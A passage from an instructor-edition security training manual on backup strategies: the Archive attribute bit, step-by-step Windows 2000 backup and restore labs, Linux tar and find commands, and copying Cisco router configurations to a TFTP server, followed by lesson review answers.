How does the system decide what files to back up and what to ignore during thedifferential and incremental backup cycles? The answer lies in the Archiveattribute bit. Apart from having a filename, parent directory, date created/modified, and other identifying criteria, every file on your hard drive has eightbits that signify certain things to the OS, such as if the file is Read-Only, a Sys-tem file, and so forth. These eight bits are known as the Attribute byte.

The table shown in Figure 6-9 describes bit positions of the Attribute byte.

Figure 6-9: The Attribute byte.

The Attribute Byte

Lesson 6: Contingency Planning 397

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 451: SCNP Hardening

The purpose of the Archive bit is as follows: If this bit is ON, then the corre-sponding file has never been backed up (archived), or it has changed since lastbackup. If this bit is OFF, then the file does not need to be backed up, as it hasnot changed since the last time it was archived. In other words, if you back up afile by using archiving software, then the archiving software will turn the Archivebit off. When you use some application to modify that file, the moment youmodify it, its Archive bit is turned back on again.

When you perform a normal backup, all of the files that you have selected forbackup will be backed up, and their respective Archive bits will be turned off.

When you perform a differential backup, the backup software looks for onlythose files that have their Archive bits turned back on again, because some appli-cation opened, modified, and then saved those files. The archiving software willselect only those files for backing up. However, during a differential backup, thearchiving software will not set the Archive bit to the off position. Why is this?Because, according to the requirements, the baseline is set for the first normalbackup. After the normal backup, all files that were modified will have theirArchive bit set to on and will remain on, even if the archiving software archivedit, to preserve the baseline from the normal backup.

When you perform an incremental backup, the backup software looks for onlythose files that have their Archive bits turned back on again, because some appli-cation opened, modified, and then saved those files. The archiving software willselect only those files for backing up. During an incremental backup, thearchiving software does set the Archive bit to the off position. Why? Because,according to the requirements, the baseline is set for each day. Every day is thebaseline for the next day.

Backup Strategies for Windows ComputersMost operating systems have some backup and restore software included withthem. In Windows 2000, ntbackup.exe can be run as both a command-line tooland as a GUI. This tool enables you to back up the entire system, portions of thesystem, or individual files to many media formats, including your own hard drive,to another hard drive, somewhere else on the network, to a tape drive, or even toa floppy disk. You are no longer constrained to using only a tape drive, as youwere in Windows NT 4.

Current Products that Can be Used for BackupOf course, you can purchase a third-party solution from companies such asVeritas (BackupExec), Seagate (Dantz), or Exabyte, which are typically usedwhen higher-end backup solutions are needed. If you do, you will have to usetheir software to perform backups. Let’s take a look at the built-in solution forbackups provided for you in Windows 2000.

398 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 452: SCNP Hardening

TASK 6D-1Creating a Folder Structure

Objective: To create files and folders to be used in testing the backupsolutions provided in the Windows 2000 OS.

Setup: You are logged on to Windows 20000 as the renamed Admin-istrator account.

1. Open Windows Explorer.

2. Select your boot partition.

3. Create a folder called BackReco.

4. In this folder, create three folders named Normal, Differential, andIncremental.

5. In the Normal folder, create two folders named Backup1 and Restore1.

6. In the Differential folder, create two folders named Backup2 andRestore2.

7. In the Incremental folder, create two folders named Backup3 andRestore3. Navigate to the BackReco\Normal\Backup1 folder.

8. Right-click anywhere within the Explorer window, and choose New→Text Document.

9. Rename the file normal.txt.

10. Observe that the file was created with the Archive attribute bit set.

Record the file modification time here:Actual times will vary for each class.

11. Double-click the file, enter any text that you like, and save and close thefile.

12. Leave this Explorer window open.

Initiating the Backup ProcessIn the following task, you will perform the steps necessary to back up the filethat you just created. To start, you will initiate a normal backup.

Lesson 6: Contingency Planning 399

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 453: SCNP Hardening

TASK 6D-2Initiating a Normal Backup

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Explorer is running.

1. From the Start menu, choose Programs→Accessories→System Tools→Backup to start the Backup utility. You might want to create a shortcut tothis utility on your Desktop so that you don’t have to go through the menusin future tasks.

2. Select the Backup tab. Expand your boot partition, and navigate to theBackReco\Normal\Backup1 folder.

3. In the right pane, check the file name of the file you just created.

4. Towards the bottom of this window, where it says Backup Destination (File)and Backup Media Or File Name: a:\backup.bkf, click the Browse button,and navigate to the BackReco\Normal\Restore1 folder.

5. Name your backup file abc, and click Open.

6. Towards the right side of the backup window, click Start Backup.

7. Click the Advanced button. Verify that the Backup Type is set toNormal. Click OK.

8. Click the Schedule button. The first time you click this button, you will beprompted to save your settings. Do so with any name you like, and enteryour logon credentials if you are prompted for them. The Scheduled JobOptions dialog box is displayed.

9. Click Properties. If you want to schedule this job for later as a one-off jobor for repetitive backups on a daily, weekly, or monthly schedule, this iswhere you enter the options.

10. Click Cancel twice.

11. Click Start Backup. A few seconds later your backup should be complete.

12. Click Close, and minimize the Backup utility.

Viewing the Results of the Backup ProcessNow that you have performed a normal backup, in the following task, you willcheck out the state of the Archive bit

400 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 454: SCNP Hardening

TASK 6D-3Viewing the State of the Archive Attribute Bit

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to the Explorer window.

2. Verify that the file does not have the Archive attribute bit set.

3. Double-click the file to open it in Notepad.

4. Enter any extra text you like.

5. Save and close the file, and switch back to the Explorer window.

6. Observe that the Archive bit is now back on again. This means that thefile has changed since the last backup and needs to be archived again. Also,observe that the file modification time has also changed.

Restoring a File from Normal BackupLet’s look at a scenario where we consider the last edit of the file to be a wrongedit; perhaps somebody tampered with the file or didn’t know what they weredoing, so you now have to restore the original file from backup.

TASK 6D-4Restoring from a Backup

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to the Backup utility.

2. Select the Restore tab. If the Restore tab contains text that indicates thatexisting files will not be replaced, choose Tools→Options, select AlwaysReplace The File On My Computer, and click OK.

3. Expand the elements in the left pane until you can see your text file inthe right pane, and then check your text file.

4. Click the Start Restore button. If you are prompted to confirm therestore, click OK.

5. In the Enter Backup File Name text box, verify the path to your backupfile, and click OK.

6. Give Backup a few seconds to do its job. Your file should be restored foryou. Click Close and minimize Backup.

Lesson 6: Contingency Planning 401

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 455: SCNP Hardening

7. Switch to the Explorer Window and observe the file modification time. Ithas reverted to the time that you recorded when you first backed up the file.

8. Open your text file in Notepad.

9. Verify that the changes you had made are now gone and that the file isin its original state.

10. Close Notepad.

Understanding Differential BackupIn the following set of tasks, you will carefully construct and step through therequirements to initiate a differential backup and restore of a set of files. You willcreate separate backup files to mimic each day of backup. You will then mimican accident by deleting all of the files in your folder. Finally, you will use theRestore feature to retrieve the deleted files.

TASK 6D-5Preparing to Start a Differential Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. In Explorer, navigate to the BackReco\Differential\Backup2 folder.

2. Expand your screen so that you can see all the columns. Add theAttributes column if it isn’t displayed.

3. Right-click in the Explorer window, and choose New→Text Document.

4. Rename this file Weekend.txt.

5. As before, observe that the file was created with the Archive attribute bitset.

Record the file modification time: Modification times will vary.

6. Double-click the file, enter Last week’s work, and then save and close thefile.

7. Leave this Explorer window open.

Backing Up Your Weekend’s WorkIn the following task, you will perform the steps necessary to back up your week-end’s work.

402 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 456: SCNP Hardening

TASK 6D-6Initiating a Differential Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to the Backup utility, and Select the Backup tab.

2. Choose Tools→Options.

3. Under Default Backup Type, verify that Normal is selected, and click OK.When you are going to be performing a differential backup, you first per-form a Normal backup.

4. In the left pane, navigate to the BackReco\Differential\Backup2 folder.

5. Check the folder.

6. Click the Browse button to specify the location of the backup media or filename.

7. Navigate to the BackReco\Differential\Restore2 folder.

8. For the file name, enter Weekend_normal, and click Open.

9. Click Start Backup, then click Start Backup again.

10. Wait a few seconds. When the backup is complete, click Close.

11. Close the Backup utility.

Adding Data During the WeekIn the following task, you will proceed to add to the work that you did last week,after backing up your weekend’s work.

TASK 6D-7Creating Additional Data

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer is running.

1. Switch to Windows Explorer and select the BackReco\Differential\Backup2 folder.

2. As you had seen earlier, observe that the file Weekend.txt no longer hasthe Archive attribute bit set.

3. Right-click in the Explorer window and choose New→Text Document.

Lesson 6: Contingency Planning 403

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 457: SCNP Hardening

4. Rename this file Monday.txt.

5. As before, observe that the file was created with the Archive attributebit set.

Record the file modification time here:Actual times will vary for each class.

6. Double-click the file, enter Monday’s work, and then save and close thefile.

7. Leave this Explorer window open.

Backing Up Data During the WeekIn the following task, you will perform the steps necessary to differentially backup the work you did after backing up your weekend’s work.

TASK 6D-8Continuing the Differential Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer is running.

1. Start the Backup utility.

2. Select the Backup tab.

3. Choose Tools→Options.

4. Under Default Backup Type, select Differential, and click OK.

5. In the left pane, navigate to the BackReco\Differential\Backup2 folder.

6. Check the folder.

7. Click the Browse button to specify the location of the backup media or filename.

8. Navigate to the BackReco\Differential\Restore2 folder.

9. For the filename, enter Mon_diff, and click Open. This now represents thefollow-up to the normal backup you carried out earlier.

10. Click Start Backup, and then click Start Backup again.

11. When the backup is complete, click Close.

12. Minimize the Backup utility.

404 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 458: SCNP Hardening

Adding More DataIn the following task, you will perform the steps necessary to add more workafter performing your first differential backup.

TASK 6D-9Adding Data After a Differential Backup

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.

2. Observe that the Archive attribute bit for the file Monday.txt is still on.When you chose to do a differential backup, the file was backed up, but theArchive attribute bit was not touched.

3. Create a new text document named Tuesday.txt.

4. As before, observe that the file was created with the Archive attribute bitset.

Record the file modification time: Modification times will vary.

5. Double-click the file, enter Tuesday’s work, and then save and close thefile.

6. Leave this Explorer window open.

Backing Up More DataIn the following task, you will perform the steps necessary to back up the workyou did after backing up your previous day’s work.

TASK 6D-10Differentially Backing Up More Data

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to the Backup utility.

2. Choose Tools→Options.

3. Under Default Backup Type, verify that Differential is selected, and clickOK.

Lesson 6: Contingency Planning 405

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 459: SCNP Hardening

4. In the left pane, navigate to the BackReco\Differential\Backup2 folder,and check the folder.

5. Browse to specify the BackReco\Differential\Restore2 folder as the loca-tion of the backup media or file name.

6. For the file name, enter Tue_diff, and click Open.

7. Start the backup (click Start Backup, and then click Start Backup again).

8. When the backup is complete, click Close.

9. Minimize the Backup utility.

Accidentally Deleting DataIn the following task, you will mimic an accidental destruction of all of the workyou did this week, as well as last week’s work.

TASK 6D-11Destroying Backed-up Data

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.

2. Observe that the Archive Attribute bit for the file Tuesday.txt is still on.

3. Delete all of the files in the Backup2 folder.

4. Leave this Explorer window open.

Restoring Data from a Differential BackupIn the following task, you will use your backup files to restore all of the workyou did this week and last week.

406 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 460: SCNP Hardening

TASK 6D-12Restoring Files from a Differential Backup

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to the Backup utility.

2. Select the Restore tab.

3. If you see some Media files, select all of them in the right pane, andchoose Tools→MediaTools→Delete Catalog.

4. Choose Tools→Catalog A Backup File.

5. Browse to the BackReco\Differential\Restore2 folder, and selectWeekend_normal.bkf. Click Open, and then click OK.

6. In the left pane, expand File (the one with the CD-ROM icon) and the fullpath under Media Created On File (the one with the floppy disk icon)below it.

7. If a pop-up is displayed, verify that the file listed is the Weekend_normal.bkf file, and click OK.

8. Check the Backup2 folder.

9. Click the Start Restore button.

10. Click OK twice.

11. When the restore is complete, click Close.

12. Minimize the Backup utility.

13. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.

14. Observe that the Weekend.txt file is restored. But, you need to have thisweek’s work, too!

15. Switch to the Backup utility.

16. On the Restore tab, select the Media file, and choose Tools→MediaTools→Delete Catalog.

17. Choose Tools→Catalog A Backup File.

18. Browse to the BackReco\Differential\Restore2 folder, and selectTue_diff.bkf.

19. In the left pane, expand File and the full path under the Media CreatedOn File below it.

Each time that you are prompted for the location of the file, verify that the

Lesson 6: Contingency Planning 407

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 461: SCNP Hardening

file listed is the Tue_diff.bkf file, and click OK.

20. Check the Backup2 folder.

21. Start the restore.

22. Click OK twice.

23. When the restore is complete, click Close.

24. Minimize the Backup utility.

25. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.

26. Observe that both the Monday.txt and Tuesday.txt files have beenrestored.

Optional TasksThe previous set of tasks were designed to walk you through the process of back-ing up and restoring a set of files by using the differential backup method. Theset of tasks that follow are optional and are designed to help you understand thesteps required to achieve the same objective, this time by using the incrementalbackup method. Because we are using very small files to illustrate the process, itmay seem that there’s not much difference between the two in terms of timetaken to back up and restore. In the real world, when faced with the choice ofbacking up large amounts of data every day, there can sometimes be an order ofmagnitude in the difference between adopting one method over the other.

Understanding Incremental BackupIn the following set of tasks, you will carefully construct and step through therequirements to initiate an incremental backup and restore of a set of files. Youwill create separate backup files to mimic each day of backup. You will thenmimic the accidental destruction of data by corrupting a file and by deleting allof the files in your folder. You will then use the Restore feature to retrieve thenecessary files.

OPTIONAL TASK 6D-13Preparing to Start an Incremental Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Navigate to the BackReco\Incremental\Backup3 folder.

2. Expand your screen so that you can see all of the columns.

3. Create a new text document named Weekend.txt.

408 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 462: SCNP Hardening

4. As before, observe that the file was created with the Archive attribute bitset.

Record the file modification time: Modification times will vary.

5. Double-click the file, enter Last week’s work, and then save and close thefile.

6. Leave this Explorer window open.

Backing up Your Weekend’s WorkIn the following task, you will perform the steps necessary to back up your week-end’s work.

OPTIONAL TASK 6D-14Initiating an Incremental Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to the Backup utility, and Select the Backup tab.

2. Choose Tools→Options.

3. Under Default Backup Type, select Normal, and click OK. When you aregoing to be performing an incremental backup, you first perform a normalbackup.

4. In the left pane, navigate to the BackReco\Incremental\Backup3 folder.

5. Check the folder.

6. Browse to specify BackReco\Incremental\Restore3 as the location of thebackup media or file name.

7. For the file name, enter Weekend_normal, and click Open.

8. Start the backup.

9. When the backup is complete, click Close.

10. Minimize the Backup utility.

Adding Data During the WeekIn the following task, you will proceed to add to the work you did last week.

Lesson 6: Contingency Planning 409

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 463: SCNP Hardening

OPTIONAL TASK 6D-15Creating Additional Data

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

2. As you had seen earlier, observe that the file Weekend.txt no longer hasthe Archive attribute bit set.

3. Create a new text document named Monday.txt.

4. As before, observe that the file was created with the Archive attribute bitset.

Record the file modification time: Modification times will vary.

5. Double-click the file, enter Monday’s work, and then save and close thefile.

6. Leave this Explorer window open.

Backing Up Data During the WeekIn the following task, you will perform the steps necessary to incrementally backup the work you did after backing up your weekend’s work.

OPTIONAL TASK 6D-16Continuing the Incremental Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to the Backup utility, and verify that the Backup tab is active.

2. Choose Tools→Options.

3. Under Default Backup Type, select Incremental, and click OK.

4. In the left pane, navigate to the BackReco\Incremental\Backup3 folder.

5. Check the folder.

6. Browse to specify BackReco\Incremental\Restore3 as the location of thebackup media or file name.

410 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 464: SCNP Hardening

7. For the file name, enter Mon_incr, and click Open. This now represents thefollow-up to the normal backup you carried out earlier.

8. Start the backup.

9. When the backup is complete, click Close.

10. Minimize the Backup utility.

Adding More DataIn the following task, you will perform the steps necessary to add more workafter performing your first incremental backup.

OPTIONAL TASK 6D-17Adding Data After an Incremental Backup

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

2. Observe that the Archive attribute bit for the file Monday.txt is now off.When you chose to do an incremental backup, the file was backed up andthe Archive attribute bit was set to 0.

3. Create a new text document named Tuesday.txt.

4. As before, observe that the file was created with the Archive attribute bitset.

Record the file modification time: Modification times will vary.

5. Double-click the file, enter Tuesday’s work, then save and close the file.

6. Leave this Explorer window open.

Backing Up More DataIn the following task, you will perform the steps necessary to incrementally backup the work you did after backing up your previous day’s work.

Lesson 6: Contingency Planning 411

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 465: SCNP Hardening

OPTIONAL TASK 6D-18Incrementally Backing Up More Data

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to the Backup utility.

2. Verify that the Incremental Backup option is selected, and click OK.

3. In the left pane, navigate to the BackReco\Incremental\Backup3 folder.

4. Check the folder.

5. Browse to specify BackReco\Incremental\Restore3 as the location of thebackup media or file name.

6. For the filename, enter Tue_incr, and click Open.

7. Start the backup.

8. When the backup is complete, click Close.

9. Minimize the Backup utility.

Accidentally Corrupting DataIn the following task, you will simulate a situation where someone trashes a fileby replacing it with unwanted text.

OPTIONAL TASK 6D-19Corrupting Backed-up Data

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

2. Observe that the Archive attribute bit for the file Tuesday.txt is off.

3. Open Monday.txt.

4. Delete the existing text. Add some gibberish, and save and close the file.

5. Observe that the Archive bit is back on again for Monday.txt.

6. Leave this Explorer window open.

412 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 466: SCNP Hardening

Restoring Data from an Incremental BackupIn the following task, you will use your backup files to restore just the work thatwas messed up, not all of the data.

OPTIONAL TASK 6D-20Restoring an Incrementally Backed-up File

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Switch to the Backup utility.

2. Select the Restore tab.

3. If you see some media files, delete the catalog.

4. Choose Tools→Catalog A Backup File.

5. Browse to and open \BackReco\Incremental\Restore3\Mon_incr.bkf.

6. In the left pane, expand File and the full path under the Media CreatedOn File below it (verifying the file location as you expand).

7. Check the Backup3 folder.

8. Start the restore.

9. Click OK twice.

10. When the restore is complete, click Close.

11. Minimize the Backup utility.

12. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

13. Open Monday.txt, and verify that it has been properly restored.

14. Close Notepad.

Performing an Incomplete Restore from IncrementalBackupIn the following task, you will mimic the accidental destruction of all the workyou did this week and last week. You will then incorrectly try to restore all thework you lost. This will help you understand the right way of implementing arestore from incremental backup.

Lesson 6: Contingency Planning 413

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 467: SCNP Hardening

OPTIONAL TASK 6D-21Incompletely Restoring from Incremental Backup

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Highlight all three text files in the Backup3 folder, and delete them.

2. Leave this Explorer window open.

3. Switch to the Backup utility.

4. On the Restore tab, if you see some media files, delete the catalog.

5. Choose Tools→Catalog A Backup File.

6. Browse to and open\BackReco\Incremental\Restore3 folder\Weekend_normal.bkf.

7. In the left pane, expand File and the full path under the Media CreatedOn File below it.

8. Check the Backup3 folder.

9. Start the restore.

10. Click OK twice.

11. When the restore is complete, click Close.

12. Minimize the Backup utility.

13. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

14. Verify that the Weekend.txt file has been restored.

15. Switch to the Backup utility.

16. On the Restore tab, delete the existing media catalog.

17. Catalog the Tue_incr.bkf backup file.

18. In the left pane, expand File and the full path under the Media CreatedOn File below it.

19. Check the Backup3 folder.

20. Start the restore.

21. Click OK twice.

22. When the restore is complete, click Close.

23. Minimize the Backup utility.

414 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 468: SCNP Hardening

24. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.

25. Observe that only the Tuesday.txt file was restored. The Monday.txt file isstill missing.

Analyzing the Incremental RestoreWhat happened just now? When choosing to restore from an incremental backupset, in order to fully restore all of the files, you must start with the first (normal)backup and then proceed to restore from every subsequent incremental archive.

OPTIONAL TASK 6D-22Completely Restoring from Incremental Backup

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and Windows Explorer and the Backup utilityare running.

1. Highlight the two text files in this folder, and delete them.

2. Leave this Explorer window open.

3. Switch to the Backup utility.

4. Delete the media catalog, catalog the Weekend_normal.bkf file, andrestore from that file.

5. In Explorer, verify that the Weekend.txt file has been restored.

6. In the Backup utility, delete the media catalog, catalog the Mon_incr.bkfbackup file, and restore from that file.

7. In Explorer, verify that the Monday.txt file has been restored.

8. In the Backup utility, delete the media catalog, catalog the Tue_incr.bkfbackup file, and restore from that file.

9. Close the Backup utility.

10. In Explorer, verify that the Tuesday.txt file has been restored. You nowhave correctly restored all of the files from the incremental backup set.

11. Close Explorer.

Backup Options for Linux ComputersStrategies for backup up in Linux are the same as with any other OS; you stillchoose between normal, differential, or incremental backups. Most administratorstypically would still use home-grown solutions based off tar or cpio to backup their files, as these facilities are built in to the OS.

Lesson 6: Contingency Planning 415

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 469: SCNP Hardening

Some third-party and commercial utilities available for Linux include:

• Lone Tar (from www.cactus.com)

• Afbackup (from http://sourceforge.net/projects/afbackup)

• Arkeia (from www.arkeia.com), an enterprise backup system. Incidentally,while Arkeia for the enterprise has a price tag to it, Arkeia-Lite for oneLinux server with two clients is free.

• Amanda (from www.amanda.org), a comprehensive network backup system.The Advanced Maryland Automatic Network Disk Archiver, as the nameimplies, was developed at the University of Maryland. AMANDA can beused as a network backup system. It enables a LAN administrator to set up aserver as a master backup server. Using this server, the administrator canback up multiple hosts to a single large-capacity tape drive. AMANDA usesthe native dump and/or GNU tar facilities to back up many workstations onthe network even if they run different versions of Unix or Linux. The newversions of AMANDA can also use SAMBA to back up Windowsworkstations.

Current Products that Can be Used for BackupThe GNU tar utility is an abbreviation for Tape Archive and is the traditionalway Unix machines used to create archives on tape as a backup and recoverymechanism. When you are backing up to a device, you have to specify the deviceby name, such as:

• Floppy disk: /dev/fd0

• SCSI tape drive: /dev/st0

Let’s say you wanted to back some files (file1, file2, and file3) to a floppy disk. Ifthe files are larger than a single floppy, then you want the archiving software tospan it across multiple floppies. In this case, you would use the tar command asfollows:

tar -cfzM /dev/fd0 file1 file2 file3

If you read the man pages for tar, you will see that the switches work as follows:

• -c = create

• -f = archive (name of the archive file or location)

• -z = zip the file

• -M = multi-volume

If you just wanted to create an archive of two files (abc.txt and def.txt) to asingle file called abcdef.tar on your hard drive, you could, for example, use thefollowing command:

tar -cf abcdef.tar abc.txt def.txt

Another useful command to know is the find command. This command, with theappropriate switches, can be used to find files that were created or modified in thelast day, as shown here:

find -mtime -1 -type f -print

If you were to run the tar routine and, instead of specifying individual files, youenclosed this find command in single back quotes, the result of the find commandwould be tarred. (The single back quote on a U.S.-International keyboard is to theleft of the numeral 1. The single quote that’s to the right of the semi-colon is notthe one we want.)

416 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 470: SCNP Hardening

So, if you were scheduling an incremental backup every day, you would, on thefirst day, tar all the files you wanted to archive (maybe to a tape); then, on subse-quent days, you would tell tar to archive only those files that changed on thatday.

TASK 6D-23Using the tar Command for Incremental Backups

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Log in to Linux as root, and open a Terminal Window.

2. Create a directory called tartest, and then change to that directory.

3. Enter touch abc.txt to create a file.

4. Enter touch def.txt to create another file.

5. Enter find -mtime -1 -type f -print to find files that have been created orchanged within the last day. You should be shown a list of the two files youjust created.

6. Enter tar -cf abcdef.tar `find -mtime -1 -type f -print` to tar the results ofthe find command. Remember that both of the quotes need to be back singlequotes. A compressed tar file called abcdef.tar will be created for you.

7. Verify that the new tar file was created, and close the Terminal Window.

Backup Strategies for Cisco RoutersEarlier in the Cisco router lesson, you looked at router configuration information.A router’s running configuration is saved to a flash file, which is usually namedrunning_config. These configuration files are typically uploaded to or retrievedfrom tftp servers somewhere on the network. A lot of work goes into configuringa production router. These configuration files, including any access lists, can beconsidered to be sensitive information. As such, this information should bebacked up to removable media and stored in a secure location. The typicalmethod of backing up a configuration file is to upload it to a tftp server.

Cisco has a tftp server available for use on a Windows 9x/NT machine from theirWeb site at www.cisco.com/pcgi-bin/tablebuild.pl/tftp. You must accept theSoftware License Agreement before downloading the tftp server software. Othertftp servers are also available, such as the one from the Solarwinds Web site. Ofcourse, you can simply implement the Remote Installation Service (RIS) for Win-dows 2000, then turn on the tftp daemon service to make your Windows 2000Server into a tftp server, but this will work only on Windows 2000 Server. Inorder to implement the full-fledged RIS, you must have a Windows 2000 domain,but for the purposes of this exercise it does not matter—we just need RIS to beable to include the tftp service.

Make sure that you type thenumeral 1 (not the letter l)for the second argument.

Lesson 6: Contingency Planning 417

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 471: SCNP Hardening

Once you have a tftp server, you can issue the appropriate commands on theCisco router to upload its configuration information to the tftp server. After thefile is uploaded, you can take it off the server and put it on a floppy disk forsafekeeping. If you want to make this information more secure, you can encryptthe file by using PGP or any other encrypting tool.

For the purposes of the subsequent tasks, you will implement the built in tftpsolution in Windows 2000 Server.

TASK 6D-24Backing Up Cisco Router Configurations

Setup: You are logged in to Linux as root.

1. Log on to Windows 2000 Server as the renamed Administrator account.

2. Open the Add/Remove Programs Control Panel.

3. Click Add/Remove Windows Components, and wait for a few seconds.

4. Scroll down the list, check Remote Installation Services, and click Next.

5. When prompted, provide the path to the Windows 2000 installation files.

6. Click OK.

7. Click Finish, and then click Yes to restart the computer. Then, log back onto Windows 2000 as the renamed Administrator account.

8. From the Start menu, choose Programs→Administrative Tools→Services.

9. In the right pane, scroll down and look for the Trivial FTP DaemonService.

10. Right-click this service, and choose Start.

11. Close the Services console.

12. Open Windows Explorer.

13. Expand your boot partition. You should see a folder called tftpdroot.Double-click this folder. This is the folder where anyone tftp-ing to yourserver would place their files. Leave Explorer open.

14. Open a command prompt, and enter netstat -a to verify that your machinehas its UDP port open for tftp. You have just set up a tftp server.

15. Telnet to your router, or use SSH, if it is enabled.

16. Switch to Enable Mode.

17. Enter copy ru tftp to begin copying the configuration file.

PGP:(Pretty Good Privacy) A

freeware program primarilyfor secure electronic mail.

If you need to create useraccounts for students, usethe username command in

a console session.

418 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 472: SCNP Hardening

18. When prompted for the address or name of the remote host, enter yourcomputer’s IP address. Next, you will be prompted for a destination filename.

19. Press Enter to accept the default file name.

20. Wait a few seconds, and your configuration will be copied over to thetftp server.

21. Close the remote router session.

22. Switch to Explorer.

23. Verify that there is a file called left-config (or right-config, as the casemay be) in the tftpdroot folder.

24. Double-click this file and open it in Wordpad. You can see the router’sentire configuration in this file. In a production environment, you would pro-tect this file very carefully by moving it over to removable media andstoring the media in a safe place.

25. Close all open windows.

SummaryIn this lesson, you looked at various types of disasters that could befall anorganization and put it out of commission—unless the organization hadalready implemented some form of business continuity planning. You lookedat how such plans could be developed and tested. You looked at technolo-gies to keep you powered on, backup strategies for operating systems, andproducts that can be used in various situations.

Lesson Review6A Broadly speaking, what are the two types of disasters that can affect a

business?

Natural disasters and man-made disasters.

List the two basic parts to a quantitative risk analysis.

The probability of a threat occurring and the estimated loss that will resultfrom the threat.

6B What must be undertaken by a company before creating a contingencyplan?

A risk analysis.

Before a contingency plan is put to effect, what must be done?

It must be tested.

Lesson 6: Contingency Planning 419

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 473: SCNP Hardening

What are the three types of tests that are typically carried out on a con-tingency plan?

• Simulated testing on paper (or check list test).

• Limited environment simulation (or structured walk-through test).

• Full scale environment simulation (or full interruption test).

6C Voltage stabilizers can be used to combat what kind of electrical distur-bances?

Spikes, surges, and sags.

Generators can be used to combat what kind of electrical disturbances?

Blackouts.

List at least three fuel types for conventional combustion-type electricalgenerators (other than diesel, propane, kerosene, and gasoline).

Responses might include CNG, LNG, methanol, and ethanol.

6D What are the minimum number of disks required to implement RAID5?

Three.

What is the disk-utilization percentage for RAID 10?

50 percent.

List some of the requirements for a hot site:

Responses might include:

• Hot sites are practically a working replica of your server and clientconfigurations.

• The company uptime at the hot site should be achieved in a matter ofhours, not days.

Broadly speaking, what are the three types of backups implemented bymost system administrators?

Normal, differential, and incremental.

